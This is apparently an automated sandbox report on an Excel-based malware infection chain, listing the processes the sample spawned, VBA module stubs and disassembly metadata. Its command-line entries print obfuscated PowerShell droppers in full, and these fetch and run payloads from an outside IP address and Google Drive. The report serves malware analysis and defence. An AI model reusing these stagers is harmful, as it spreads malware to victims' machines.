Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:19
                                                                                                  Start time:03:04:45
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:20
                                                                                                  Start time:03:04:47
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jk3wn0wt\jk3wn0wt.cmdline"
                                                                                                  Imagebase:0x13f840000
                                                                                                  File size:2'758'280 bytes
                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:21
                                                                                                  Start time:03:04:48
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\jk3wn0wt\CSCA3D842248D9345F9BBF58E745EE55AE.TMP"
                                                                                                  Imagebase:0x13fda0000
                                                                                                  File size:52'744 bytes
                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:23
                                                                                                  Start time:03:04:51
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
                                                                                                  Imagebase:0xff810000
                                                                                                  File size:168'960 bytes
                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:24
                                                                                                  Start time:03:04:51
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:26
                                                                                                  Start time:03:04:53
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
                                                                                                  Imagebase:0x13fcc0000
                                                                                                  File size:443'392 bytes
                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:27
                                                                                                  Start time:03:05:04
                                                                                                  Start date:30/10/2024
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                                                                                                  Imagebase:0x10a0000
                                                                                                  File size:45'160 bytes
                                                                                                  MD5 hash:04AA198D72229AEED129DC20201BF030
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:false

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Call Graph

                                                                                                  • Entrypoint
                                                                                                  • Decryption Function
                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  • Show Help
                                                                                                  callgraph 1 Error: Graph is empty

                                                                                                  Module: Sheet1

                                                                                                  Declaration
                                                                                                  LineContent
                                                                                                  1

                                                                                                  Attribute VB_Name = "Sheet1"

                                                                                                  2

                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                  3

                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                  4

                                                                                                  Attribute VB_Creatable = False

                                                                                                  5

                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                  6

                                                                                                  Attribute VB_Exposed = True

                                                                                                  7

                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                  8

                                                                                                  Attribute VB_Customizable = True

                                                                                                  Module: Sheet2

                                                                                                  Declaration
                                                                                                  LineContent
                                                                                                  1

                                                                                                  Attribute VB_Name = "Sheet2"

                                                                                                  2

                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                  3

                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                  4

                                                                                                  Attribute VB_Creatable = False

                                                                                                  5

                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                  6

                                                                                                  Attribute VB_Exposed = True

                                                                                                  7

                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                  8

                                                                                                  Attribute VB_Customizable = True

                                                                                                  Module: Sheet3

                                                                                                  Declaration
                                                                                                  LineContent
                                                                                                  1

                                                                                                  Attribute VB_Name = "Sheet3"

                                                                                                  2

                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                  3

                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                  4

                                                                                                  Attribute VB_Creatable = False

                                                                                                  5

                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                  6

                                                                                                  Attribute VB_Exposed = True

                                                                                                  7

                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                  8

                                                                                                  Attribute VB_Customizable = True

                                                                                                  Module: ThisWorkbook

                                                                                                  Declaration
                                                                                                  LineContent
                                                                                                  1

                                                                                                  Attribute VB_Name = "ThisWorkbook"

                                                                                                  2

                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                  3

                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                  4

                                                                                                  Attribute VB_Creatable = False

                                                                                                  5

                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                  6

                                                                                                  Attribute VB_Exposed = True

                                                                                                  7

                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                  8

                                                                                                  Attribute VB_Customizable = True

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 02820FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000003.430434791.0000000002820000.00000010.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_3_2820000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction ID: 5087491f98469b7b1ff2dcdf06fe88971f75f9ccb3ec7a0dc16aec451056d268
                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 02820FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000003.430434791.0000000002820000.00000010.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_3_2820000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction ID: 5087491f98469b7b1ff2dcdf06fe88971f75f9ccb3ec7a0dc16aec451056d268
                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 02820FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000003.430434791.0000000002820000.00000010.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_3_2820000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction ID: 5087491f98469b7b1ff2dcdf06fe88971f75f9ccb3ec7a0dc16aec451056d268
                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Function 02820FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000003.430434791.0000000002820000.00000010.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_3_2820000_mshta.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction ID: 5087491f98469b7b1ff2dcdf06fe88971f75f9ccb3ec7a0dc16aec451056d268
                                                                                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                                                                                    • Instruction Fuzzy Hash:

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:5.2%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:3
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph 2282 7fe899f59e1 2283 7fe899f59f1 URLDownloadToFileW 2282->2283 2285 7fe899f5b00 2283->2285

                                                                                                    Executed Functions

                                                                                                    Function 000007FE899F4B14 Relevance: 1.6, APIs: 1, Instructions: 133filenetworkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.462589052.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7fe899f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DownloadFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 1407266417-0
                                                                                                    • Opcode ID: 9c38f7e9612c14f9591394aafe4522f42861c8814b26e8e3d9cefaf0f52ba47f
                                                                                                    • Instruction ID: 35e478a428dcbe3e515c745e49278a67e6eeb02ab5607ce6fdd71ad18455ee0b
                                                                                                    • Opcode Fuzzy Hash: 9c38f7e9612c14f9591394aafe4522f42861c8814b26e8e3d9cefaf0f52ba47f
                                                                                                    • Instruction Fuzzy Hash: 4E318071908A5C8FDB58EB5CD8856B9BBE1FB69321F00822ED04DD3651CB70A8558B91
                                                                                                    Function 000007FE899F59E1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.462589052.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7fe899f0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DownloadFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 1407266417-0
                                                                                                    • Opcode ID: f61b9244031784aa4f978e3b1e5c9187f8f19529f697349be5ca96f07d472af4
                                                                                                    • Instruction ID: 552a763757c0472ca28501dde98d0d8ef031b08746ffb24e4959dd85bcc92dae
                                                                                                    • Opcode Fuzzy Hash: f61b9244031784aa4f978e3b1e5c9187f8f19529f697349be5ca96f07d472af4
                                                                                                    • Instruction Fuzzy Hash: B241E27191DB889FDB19DB58D8447B9BBF0FB56321F0482AFD08DD3162CB24A856C782
                                                                                                    Function 000007FE89AC26E9 Relevance: .7, Instructions: 707COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 26 7fe89ac26e9-7fe89ac2799 27 7fe89ac2c7d-7fe89ac2d36 26->27 28 7fe89ac279f-7fe89ac27a9 26->28 29 7fe89ac27ab-7fe89ac27b8 28->29 30 7fe89ac27c2-7fe89ac27c9 28->30 29->30 34 7fe89ac27ba-7fe89ac27c0 29->34 31 7fe89ac27cb-7fe89ac27de 30->31 32 7fe89ac27e0 30->32 35 7fe89ac27e2-7fe89ac27e4 31->35 32->35 34->30 37 7fe89ac27ea-7fe89ac27f6 35->37 38 7fe89ac2bf8-7fe89ac2c02 35->38 37->27 42 7fe89ac27fc-7fe89ac2806 37->42 40 7fe89ac2c15-7fe89ac2c25 38->40 41 7fe89ac2c04-7fe89ac2c14 38->41 43 7fe89ac2c27-7fe89ac2c2b 40->43 44 7fe89ac2c32-7fe89ac2c7c 40->44 45 7fe89ac2808-7fe89ac2815 42->45 46 7fe89ac2822-7fe89ac2832 42->46 43->44 45->46 48 7fe89ac2817-7fe89ac2820 45->48 46->38 53 7fe89ac2838-7fe89ac286c 46->53 48->46 53->38 58 7fe89ac2872-7fe89ac287e 53->58 58->27 59 7fe89ac2884-7fe89ac288e 58->59 60 7fe89ac28a7-7fe89ac28ac 59->60 61 7fe89ac2890-7fe89ac289d 59->61 60->38 63 7fe89ac28b2-7fe89ac28b7 60->63 61->60 62 7fe89ac289f-7fe89ac28a5 61->62 62->60 63->38 64 7fe89ac28bd-7fe89ac28c2 63->64 64->38 66 7fe89ac28c8-7fe89ac28d7 64->66 67 7fe89ac28e7 66->67 68 7fe89ac28d9-7fe89ac28e3 66->68 71 7fe89ac28ec-7fe89ac28f9 67->71 69 7fe89ac2903-7fe89ac298e 68->69 70 7fe89ac28e5 68->70 78 7fe89ac29a2-7fe89ac29c4 69->78 79 7fe89ac2990-7fe89ac299b 69->79 70->71 71->69 72 7fe89ac28fb-7fe89ac2901 71->72 72->69 80 7fe89ac29c6-7fe89ac29d0 78->80 81 7fe89ac29d4 78->81 79->78 82 7fe89ac29d2 80->82 83 7fe89ac29f0-7fe89ac2a7e 80->83 84 7fe89ac29d9-7fe89ac29e6 81->84 82->84 91 7fe89ac2a92-7fe89ac2ab0 83->91 92 7fe89ac2a80-7fe89ac2a8b 83->92 84->83 85 7fe89ac29e8-7fe89ac29ee 84->85 85->83 93 7fe89ac2ab2-7fe89ac2abc 91->93 94 7fe89ac2ac0 91->94 92->91 95 7fe89ac2add-7fe89ac2b6d 93->95 96 7fe89ac2abe 93->96 97 7fe89ac2ac5-7fe89ac2ad3 94->97 104 7fe89ac2b6f-7fe89ac2b7a 95->104 105 7fe89ac2b81-7fe89ac2bda 95->105 96->97 97->95 98 7fe89ac2ad5-7fe89ac2adb 97->98 98->95 104->105 108 7fe89ac2be2-7fe89ac2bf7 105->108
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.462716786.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7fe89ac0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 262cca7c6dad6b1abf0cdc6a85c27870cb43b03af9947860cec7c03b56139cba
                                                                                                    • Instruction ID: 8887c8ef411d7241eae1e9f421bc1d151fb1ef1fb9e5d88fd341403dd6bc03f1
                                                                                                    • Opcode Fuzzy Hash: 262cca7c6dad6b1abf0cdc6a85c27870cb43b03af9947860cec7c03b56139cba
                                                                                                    • Instruction Fuzzy Hash: AF22143090CB894FD799EB2C94546697BE2FF9A348F2401EED44EC72A3DA24AC56C741
                                                                                                    Function 000007FE89AC0F0D Relevance: .4, Instructions: 357COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 109 7fe89ac0f0d-7fe89ac0f96 111 7fe89ac0f9c-7fe89ac0fa6 109->111 112 7fe89ac1098-7fe89ac109e 109->112 113 7fe89ac0fa8-7fe89ac0fb5 111->113 114 7fe89ac0fbf-7fe89ac0fee 111->114 117 7fe89ac109f-7fe89ac10d0 112->117 113->114 116 7fe89ac0fb7-7fe89ac0fbd 113->116 114->112 123 7fe89ac0ff4-7fe89ac0ffe 114->123 116->114 122 7fe89ac10d2-7fe89ac10dc 117->122 124 7fe89ac10ed-7fe89ac1124 122->124 125 7fe89ac10de-7fe89ac10ec 122->125 126 7fe89ac1017-7fe89ac1077 123->126 127 7fe89ac1000-7fe89ac100d 123->127 128 7fe89ac112a-7fe89ac119e 124->128 129 7fe89ac11c1-7fe89ac11cb 124->129 125->124 141 7fe89ac108b-7fe89ac1097 126->141 142 7fe89ac1079-7fe89ac1084 126->142 127->126 130 7fe89ac100f-7fe89ac1015 127->130 145 7fe89ac11a6-7fe89ac11be 128->145 131 7fe89ac11cd-7fe89ac11d7 129->131 132 7fe89ac11d8-7fe89ac11e8 129->132 130->126 133 7fe89ac11ea-7fe89ac11ee 132->133 134 7fe89ac11f5-7fe89ac121a 132->134 133->134 142->141 145->129
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.462716786.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7fe89ac0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9f4f9802a3ad4c8595e16db17a24c3ca07a932bed3fbc2f18b9a0ced0a5f7f91
                                                                                                    • Instruction ID: d30eaa471d4e8c08d071d13f5598caf2856c3a1dbafdaf6eb2658bbfbbf94c4e
                                                                                                    • Opcode Fuzzy Hash: 9f4f9802a3ad4c8595e16db17a24c3ca07a932bed3fbc2f18b9a0ced0a5f7f91
                                                                                                    • Instruction Fuzzy Hash: 26B1F420A0D7CA0FE357973C58606617FE1EF57258F2901EBD58DCB1A3D5189C5AC361

                                                                                                    Non-executed Functions

                                                                                                    Function 000007FE89AC00DD Relevance: 1.2, Instructions: 1196COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.462716786.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
